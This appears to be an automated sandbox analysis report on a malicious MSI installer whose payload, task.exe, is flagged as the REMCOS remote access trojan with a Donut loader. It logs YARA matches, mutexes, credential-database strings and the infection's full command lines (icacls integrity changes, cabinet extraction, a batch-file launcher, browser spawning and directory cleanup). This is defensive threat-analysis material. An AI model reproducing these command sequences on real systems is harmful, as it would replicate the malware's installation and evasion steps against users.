                  Source: 22.2.task.exe.60000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 30.2.task.exe.120000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 30.2.task.exe.6066b.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000008.00000002.1571921794.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                  Source: task.exe, 00000016.00000003.1652380221.0000000003B31000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1647531865.0000000003CAF000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1649253542.0000000003B31000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1652045010.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1647738667.0000000003CAF000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1652977874.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1650539674.0000000003F3A000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1652572952.0000000002DFB000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1647629402.000000000086D000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1651396491.0000000004015000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1647833006.0000000000871000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .a_po^ ojYd.o B U.R G v.Q_F& ZNH K.9.sV`OQ qOq_A( N5.j P.X z.k.Yf_HL.P.L`.C Ue_q_B_t.h{_yr\=A f.3_q_Fvb_H_bm W.UP#.by_iY.Yw I.Y_G p.3c g.Zy S v.U.N C_m Z_i.H_j B l_DH_Pd.iz_O.f~ U z_Mv_d7 T Mz.f.594/}_m kS.v.D u.rZu.S G.N_x.V J.Q.G FO^.X<.6_fv.V ny.L,_E.2.m I_l.b$ Mx sZ.K! p.Y.U.V:U.89 R_H F3.d_R A UQ.C_y y Y Jb.Q_S.N.s< l_Ab~[_w9zV?!C9.N_HQ)*_n R.tP Ww_u aU;.V EPk Xr.Q0.y.A!]_b!7 g.R_pF.E_b o.o.q.o_E.T_rdfw.c}_ck.4.Y_w:_P.B(#`_xy_i.3_Y.A_N.q.6.YE_S_T.R H n.R_d_F.V.s_R68).I aL q.H b.W.Q!.r b_w c c$_va.X_v.tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_C_Q.e J q7E V P.LP_Q.kTN_c.F.D gc.hT_s_Q1
                  Source: task.exe, 00000016.00000003.1652380221.0000000003B31000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1647531865.0000000003CAF000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1649253542.0000000003B31000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1652045010.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1647738667.0000000003CAF000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1652977874.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1650539674.0000000003F3A000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1652572952.0000000002DFB000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1647629402.000000000086D000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1651396491.0000000004015000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1647833006.0000000000871000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_
                  Source: classification engineClassification label: mal100.rans.phis.troj.spyw.evad.winMSI@70/148@12/12
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8DCAF0 GetModuleHandleW,FormatMessageW,GetLastError,8_2_6C8DCAF0
                  Source: C:\Users\user\task.exeCode function: 22_2_00075C8A GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,22_2_00075C8A
                  Source: C:\Users\user\task.exeCode function: 24_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,24_2_00418758
                  Source: C:\Users\user\task.exeCode function: 22_2_0006E45A CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,22_2_0006E45A
                  Source: C:\Users\user\task.exeCode function: 22_2_00079789 FindResourceA,LoadResource,LockResource,SizeofResource,22_2_00079789
                  Source: C:\Users\user\task.exeCode function: 22_2_00078D0C OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,22_2_00078D0C
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeFile created: C:\Users\user\apps.batJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeMutant created: \Sessions\1\BaseNamedObjects\zRRdyPN41SkDaS8h3
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7880
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4212:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3632:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3340:120:WilError_03
                  Source: C:\Users\user\task.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-RNN6CM
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_03
                  Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-a34ef0fe-40fa-1ddbcb-aeea2ee60c14}
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF218C22ED6F4C8576.TMPJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\apps.bat" "
                  Source: C:\Users\user\task.exeSystem information queried: HandleInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\msiwrapper.iniJump to behavior
                  Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                  Source: task.exe, task.exe, 00000018.00000002.1684002660.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: task.exe, task.exe, 00000018.00000002.1684002660.0000000000400000.00000040.80000000.00040000.00000000.sdmp, task.exe, 0000001A.00000002.1666220432.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: task.exe, 00000016.00000002.4496169757.0000000002FF0000.00000040.10000000.00040000.00000000.sdmp, task.exe, 00000018.00000002.1684002660.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: task.exe, task.exe, 00000018.00000002.1684002660.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: task.exe, task.exe, 00000018.00000002.1684002660.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: task.exe, task.exe, 00000018.00000002.1684002660.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: task.exe, 00000018.00000002.1685578220.0000000002736000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1879011150.000001BE85C37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1878511893.000001BE85617000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1903680405.000001BE85617000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: task.exe, task.exe, 00000018.00000002.1684002660.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: wE1inOhJA5.msiReversingLabs: Detection: 44%
                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\wE1inOhJA5.msi"
                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E1280F90D0867DD413F7EEEF5D19EFB6
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
                  Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
                  Source: C:\Windows\SysWOW64\expand.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe"
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\apps.bat" "
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7880 -s 976
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\apps.bat" "
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\." /SETINTEGRITYLEVEL (CI)(OI)LOW
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\task.exe "task.exe"
                  Source: C:\Users\user\task.exeProcess created: C:\Users\user\task.exe C:\Users\user\task.exe /stext "C:\Users\user\AppData\Local\Temp\gifwhgt"
                  Source: C:\Users\user\task.exeProcess created: C:\Users\user\task.exe C:\Users\user\task.exe
                  Source: C:\Users\user\task.exeProcess created: C:\Users\user\task.exe C:\Users\user\task.exe /stext "C:\Users\user\AppData\Local\Temp\jckohyeeyyu"
                  Source: C:\Users\user\task.exeProcess created: C:\Users\user\task.exe C:\Users\user\task.exe /stext "C:\Users\user\AppData\Local\Temp\tfphirpfmgmayj"
                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\apps.bat" "
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\task.exe "task.exe"
                  Source: C:\Users\user\task.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chrFE01.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/10d9defc/6c77fc35"
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2480 --field-trial-handle=2376,i,16818295695986717264,7118115118329945779,262144 /prefetch:8
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr6BC.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/10d9defc/32916e99"
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2640 --field-trial-handle=2100,i,4541570122865520646,14461282582081406380,262144 /prefetch:3
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E1280F90D0867DD413F7EEEF5D19EFB6Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\." /SETINTEGRITYLEVEL (CI)(OI)HIGHJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* filesJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe" Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files"Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\." /SETINTEGRITYLEVEL (CI)(OI)LOWJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\apps.bat" "Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\task.exe "task.exe" Jump to behavior
                  Source: C:\Users\user\task.exeProcess created: C:\Users\user\task.exe C:\Users\user\task.exe /stext "C:\Users\user\AppData\Local\Temp\gifwhgt"Jump to behavior
                  Source: C:\Users\user\task.exeProcess created: C:\Users\user\task.exe C:\Users\user\task.exeJump to behavior
                  Source: C:\Users\user\task.exeProcess created: C:\Users\user\task.exe C:\Users\user\task.exe /stext "C:\Users\user\AppData\Local\Temp\jckohyeeyyu"Jump to behavior
                  Source: C:\Users\user\task.exeProcess created: C:\Users\user\task.exe C:\Users\user\task.exe /stext "C:\Users\user\AppData\Local\Temp\tfphirpfmgmayj"Jump to behavior
                  Source: C:\Users\user\task.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\task.exe "task.exe"
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chrFE01.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/10d9defc/6c77fc35"
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr6BC.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/10d9defc/32916e99"
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2480 --field-trial-handle=2376,i,16818295695986717264,7118115118329945779,262144 /prefetch:8
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2640 --field-trial-handle=2100,i,4541570122865520646,14461282582081406380,262144 /prefetch:3
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msihnd.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
